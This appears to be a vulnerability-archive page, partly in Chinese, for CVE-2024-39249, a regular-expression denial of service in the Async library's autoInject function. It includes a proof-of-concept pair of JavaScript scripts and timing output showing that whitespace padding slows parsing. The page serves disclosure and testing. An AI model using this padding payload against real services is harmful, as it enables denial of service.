关联漏洞
标题:
Async 安全漏洞
(CVE-2024-39249)
描述:Async是英国Caolan McMahon个人开发者的一个实用模块。用于使用异步 JavaScript。 Async 2.6.4及之前版本和3.2.5及之前版本存在安全漏洞,该漏洞源于在解析自动注入函数中的函数时容易受到正则表达式拒绝服务(ReDoS)攻击。
介绍
# CVE-2024-39249
**Vulnerability Type**
Regular expression Denial of Service (ReDoS)
**Affected Product and Version**
Async version ≤ 2.6.4 and ≤3.2.5
**Attack Vector**
Async parse function contains crafted payload.
**Description**
Async version ≤ 2.6.4 and ≤3.2.5 are vulnerable to ReDoS (Regular Expression Denial of Service) while parsing function in `autoinject` function.
**PoC**
Vulnerable regular expression: https://github.com/caolan/async/blob/v3.2.5/lib/autoInject.js#L6
Regular expression execute at: https://github.com/caolan/async/blob/v3.2.5/lib/autoInject.js#L41
We will modify baseline.js and compare computation time difference after trigger ReDoS vulnerability.
```jsx
//baseline.js
const async = require('async');
/**
* adds 3 to a number after 2 seconds
* @param text
* @returns {Promise<unknown>}
*/
const add3 = (number = 1) => {
return new Promise((resolve, reject) => {
setTimeout(() => {
resolve(number + 3)
}, 20)
})
}
/**
* Multiplies after 2 seconds
* @param a
* @param b
* @returns {Promise<unknown>}
*/
const mulitply = (a,b) => {
return new Promise((resolve, reject) => {
setTimeout(() => {
resolve(a*b)
}, 20)
})
}
/**
* A control flow using async.autoInject
* @type {string}
*/
const timerId = 'asyncAuto'
console.time(timerId);
async.autoInject({
fivePlus3: async () => add3(5),
onePlus3: async () => add3(1),
multiplyTheAboveTwoProps: async (fivePlus3,onePlus3) => mulitply(fivePlus3,onePlus3), // takes the resolved values of the fivePlus3,onePlus3
add3ToFinal: async (multiplyTheAboveTwoProps) => add3(multiplyTheAboveTwoProps), // takes the resolved value of multiplyTheAboveTwoProps
add3TofivePlus3: async (fivePlus3) => add3(fivePlus3) // takes the resolved value of fivePlus3
}).then(r => {
console.timeEnd(timerId);
console.log('finished controlled flow', r)
})
```
```jsx
//Output from running: node baseline.js
asyncAuto: 67.438ms
finished controlled flow {
fivePlus3: 8,
onePlus3: 4,
add3TofivePlus3: 11,
multiplyTheAboveTwoProps: 32,
add3ToFinal: 35
}
```
```jsx
//poc.js
const async = require('async');
/**
* adds 3 to a number after 2 seconds
* @param text
* @returns {Promise<unknown>}
*/
const add3 = (number = 1) => {
return new Promise((resolve, reject) => {
setTimeout(() => {
resolve(number + 3)
}, 20)
})
}
/**
* Multiplies after 2 seconds
* @param a
* @param b
* @returns {Promise<unknown>}
*/
const mulitply = (a,b) => {
return new Promise((resolve, reject) => {
setTimeout(() => {
resolve(a*b)
}, 20)
})
}
/**
* A control flow using async.autoInject
* @type {string}
*/
const timerId = 'asyncAuto'
console.time(timerId);
async.autoInject({
fivePlus3: async () => add3(5),
onePlus3: async () => add3(1),
//Add ' '*500 right after async
multiplyTheAboveTwoProps: async (fivePlus3,onePlus3) => mulitply(fivePlus3,onePlus3), // takes the resolved values of the fivePlus3,onePlus3
add3ToFinal: async (multiplyTheAboveTwoProps) => add3(multiplyTheAboveTwoProps), // takes the resolved value of multiplyTheAboveTwoProps
add3TofivePlus3: async (fivePlus3) => add3(fivePlus3) // takes the resolved value of fivePlus3
}).then(r => {
console.timeEnd(timerId);
console.log('finished controlled flow', r)
})
```
```jsx
//Output from running: node poc.js
asyncAuto: 1.852s
finished controlled flow {
fivePlus3: 8,
onePlus3: 4,
add3TofivePlus3: 11,
multiplyTheAboveTwoProps: 32,
add3ToFinal: 35
}
```
In summary, the increasing of whitespace leading to more computation overhead from regular expression.
文件快照
[4.0K] /data/pocs/04173e35cf5f9b6bb5ed68b00f6220e6095c7e61
└── [4.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。